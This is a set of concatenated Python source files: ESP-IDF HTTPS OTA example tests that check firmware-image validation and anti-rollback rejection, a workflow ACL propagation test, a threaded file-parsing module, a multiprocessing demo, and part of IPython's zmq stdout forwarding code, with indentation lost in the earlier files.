bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# the HTTPS server runs in a daemon thread, so it does not need to be stopped explicitly
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
This test case validates OTA behavior when the binary file is truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be generated. This value can range from 288 bytes (Image header size) to the size of the original binary file
# truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
This test case validates OTA behavior when the headers of the binary file are truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be generated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
This test case validates OTA behavior when the binary file consists of random data.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# The first byte of the binary file is always set to zero. If the first byte were generated randomly,
# it could come out as 0xE9 in some cases, which would cause the test case to fail.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads the complete binary file from the
chunked test server started with openssl s_server.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
    This is a positive test case, which starts an HTTPS server and a redirection server.
    The redirection server redirects the HTTP request to a different port, where the main
    HTTPS server serves the OTA image.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
    # Port to which the request should be redirected
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
    Verifies the behaviour of OTA when anti_rollback is enabled and the security version of
    the new image is lower than the current one.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Modified firmware image to lower security version in its header. This is to enable negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
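    # (Offset 36 is assumed to be the secure_version field of esp_app_desc_t: in the standard
    # app image layout it follows the 24-byte image header, the 8-byte first segment header
    # and the 4-byte magic_word.)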
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
    dut1.expect('App is valid, rollback cancelled successfully', timeout=30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
    os.remove(os.path.join(dut1.app.binary_path, anti_rollback_bin_name))
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
|
test_acl_propagation.py
|
# Copyright (C) 2018 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test acl role propagation on workflows."""
# pylint: disable=invalid-name
import datetime
from copy import deepcopy
from threading import Thread
from freezegun import freeze_time
from ggrc import db
from ggrc_workflows.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.models import factories
from integration.ggrc_workflows.generator import WorkflowsGenerator
class TestWorkflowAclPropagation(TestCase):
"""Test acl role propagation on workflows."""
def setUp(self):
super(TestWorkflowAclPropagation, self).setUp()
self.generator = WorkflowsGenerator()
with factories.single_commit():
self.people_ids = [
factories.PersonFactory(
name="user {}".format(i),
email="user{}@example.com".format(i),
).id
for i in range(10)
]
acr = all_models.AccessControlRole
self.acr_name_map = dict(db.session.query(
acr.name,
acr.id,
).filter(
acr.object_type == all_models.Workflow.__name__,
))
self.weekly_wf = {
"title": "weekly thingy",
"description": "start this many a time",
"access_control_list": [
{
"ac_role_id": self.acr_name_map["Admin"],
"person": {"type": "Person", "id": self.people_ids[i]},
}
for i in range(5)
],
"unit": "week",
"repeat_every": 1,
"task_groups": [{
"title": "weekly task group",
"task_group_tasks": [
{
"title": "weekly task {}".format(i),
"start_date": datetime.date(2016, 6, 10),
"end_date": datetime.date(2016, 6, 13),
}
for i in range(3)
]},
]
}
def test_async_role_propagation(self):
"""Test asynchronous acl propagations.
This test just ensures that simultaneous updates to a single workflow work.
    The test checks this by first creating a workflow with the first 5 out of 10
people mapped to that workflow. Then we trigger a bunch of updates to
workflow people while only using the last 5 people.
In the end if the procedure does not fail or return an error on any step,
we should see only a few of the last 5 people and none of the first 5
people still mapped to the workflow.
Note: This test does not check for correct setting of acl roles, but only
that those roles that are set are correctly propagated and that propagation
does not create any deadlocks.
    Since we have a bug with setting ACLs, the result of this test is that the
    same people can have the same role on a workflow multiple times, and each of
    those roles will be propagated correctly.
"""
number_of_threads = 10
def change_assignees(workflow, assignees):
"""Change workflow assignees."""
self.generator.api.put(workflow, {
"access_control_list": [
{
"ac_role_id": self.acr_name_map["Admin"],
"person": {"type": "Person", "id": self.people_ids[i]},
}
for i in assignees
],
})
updated_wf = deepcopy(self.weekly_wf)
with freeze_time("2016-6-10 13:00:00"): # Friday, 6/10/2016
_, wf = self.generator.generate_workflow(updated_wf)
self.generator.activate_workflow(wf)
threads = []
for i in range(number_of_threads):
assignees = [i % 4 + 5, i % 4 + 6]
threads.append(Thread(target=change_assignees, args=(wf, assignees)))
for t in threads:
t.start()
for t in threads:
t.join()
acl = all_models.AccessControlList
workflow_role_count = acl.query.filter(
acl.object_type == all_models.Workflow.__name__
).count()
propagated_role_count = acl.query.filter(
acl.parent_id.isnot(None)
).count()
# 1 cycle
# 1 cycle task group
# 3 cycle tasks
# 1 task group
# 3 tasks
# *2 is for all relationships that are created
number_of_wf_objects = (1 + 1 + 3 + 1 + 3) * 2
self.assertEqual(
workflow_role_count * number_of_wf_objects,
propagated_role_count
)
|
parse.py
|
#!/usr/bin/env python
# coding=utf-8
# Stan 2018-06-05
from __future__ import (division, absolute_import,
print_function, unicode_literals)
import os
from itertools import islice
from threading import Thread
from sqlalchemy import select, and_
from .. import *
from ..core.data_funcs import filter_match
from .models import Dir, File, Node, Parser, Parse
# from .proceed_dropbox import download_file_dropbox
# from .proceed_google import download_file_google
# from .proceed.yandex import yandex_download
if PY2:
from Queue import Queue, Empty
else:
from queue import Queue, Empty
RUNTIME_ERROR = -100
q = Queue(maxsize=0)
def chunk(it, size):
it = iter(it)
return iter(lambda: tuple(islice(it, size)), ())
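# Example: chunk() yields fixed-size tuples from any iterable, with a shorter final tuple for
# the remainder, e.g. list(chunk(range(5), 2)) == [(0, 1), (2, 3), (4,)].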
def do_stuff(q, options, recorder, parse):
while True:
filename = q.get()
do_stuff_row(filename, options, recorder, parse)
q.task_done()
def do_stuff_row(filename, options, recorder, parse):
try:
er = recorder.func(filename, options, recorder, parse.id)
parse.status = er
except Exception as e:
parse.status = RUNTIME_ERROR
recorder.exception("Error file parsing",
target=parse.file.name, parse_id=parse.id, once="do_stuff_1")
recorder.commit()
# delete_file(filename)
def parse_files(filename, filetype, options, recorder):
provider = options.get('provider', 'filesystem')
# if provider == 'yandex':
# download_file = yandex_download
# else: # filesystem
download_file = None
recorder.time
if filetype == 1:
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
        # The Node must already have been created
FILE, NODE = recorder.query(File, Node).filter_by(name=basename, state=1).\
join(File.node).join(File.dir).filter_by(name=dirname).first()
parse_file(FILE, NODE, options, recorder, download_file)
else:
dirs_filter = options.get('dirs_filter')
exclude_dirs_filter = options.get('exclude_dirs_filter')
dir_depth = options.get('dir_depth')
files_filter = options.get('files_filter')
limit = int(options.get('limit', 1000))
threads = int(options.get('threads', 0))
if threads:
recorder.info("Parsing with {0} threads...".format(threads))
for i in range(threads):
worker = Thread(target=do_stuff, args=(q, options, recorder, parse))
worker.setDaemon(True)
worker.start()
empty = False
while not empty:
rows = recorder.execute(sql.format(SLICE.id, limit))
rows = [i for i in rows]
empty = True
for bundle in chunk(rows, threads):
for row in bundle:
empty = False
q.put(row)
q.join()
if not empty:
recorder.debug("Processed {0} files".format(len(bundle)))
else:
recorder.info("Parsing without threads...")
rows = True
offset = 0
while rows:
scoped_dirs_expr = (
Dir.provider == recorder.provider,
Dir.name.like("{0}%".format(filename)),
)
scoped_files_expr = (
File._dir_id.in_(select([Dir.id]).where(and_(*scoped_dirs_expr))),
)
rows = recorder.query(File, Node).filter(
File.state==1,
*scoped_files_expr
).join(File.node, isouter=True).slice(offset, offset+limit).all()
offset += limit
for FILE, NODE in rows:
if FILE.type == 1 and filter_match(FILE.name, files_filter):
parse_file(FILE, NODE, options, recorder, download_file)
if rows:
recorder.debug("Processed {0} files".format(len(rows)))
recorder.info("Processing time: {0}".format(recorder.time))
def parse_file(FILE, NODE, options, recorder, download_file):
provider = options.get('provider', 'filesystem')
if provider == 'filesystem':
parse = recorder.query(Parse).filter_by(_parser_id=recorder.parser.id, _file_id=FILE.id).first()
_link = dict(file=FILE, node=NODE)
else:
if NODE is None:
recorder.warning("Node missed: '{0}'".format(FILE.name))
return
parse = recorder.query(Parse).filter_by(_parser_id=recorder.parser.id, _node_id=NODE.id).first()
_link = dict(file=FILE, node=NODE)
if parse and parse.status > RUNTIME_ERROR:
return
if not parse:
parse = Parse(parser=recorder.parser, **_link)
recorder.add(parse)
recorder.commit()
filename = "{0}/{1}".format(FILE.dir.name, FILE.name)
recorder.debug(filename, timer=('filename', 5))
if download_file:
tmp_name = "tmp/{0}".format(FILE.name)
try:
download_file(filename, tmp_name, recorder)
except Exception as e:
recorder.exception("Error file downloading",
target=FILE.name, parse_id=parse.id, once="download_file_1")
return
else:
tmp_name = filename
do_stuff_row(tmp_name, options, recorder, parse)
|
multi_processing.py
|
from multiprocessing import Process
import os
# Code to be executed by the child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
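    # A minimal extension sketch: the same child function can also be run through a process
    # pool (multiprocessing.Pool from the standard library); the names passed to map() below
    # are illustrative only.
    from multiprocessing import Pool
    pool = Pool(2)
    pool.map(run_proc, ['worker-1', 'worker-2', 'worker-3'])
    pool.close()
    pool.join()
    print('Pool processes end.')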
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
from collections import deque
try:
from importlib import lock_held as import_lock_held
except ImportError:
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from io import StringIO, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def close(self):
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
        if attr == 'io_thread' or (attr.startswith('__') and attr.endswith('__')):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def __init__(self, session, pub_thread, name, pipe=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
                # and give a timeout to avoid blocking forever
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# newlines imply flush in subprocesses
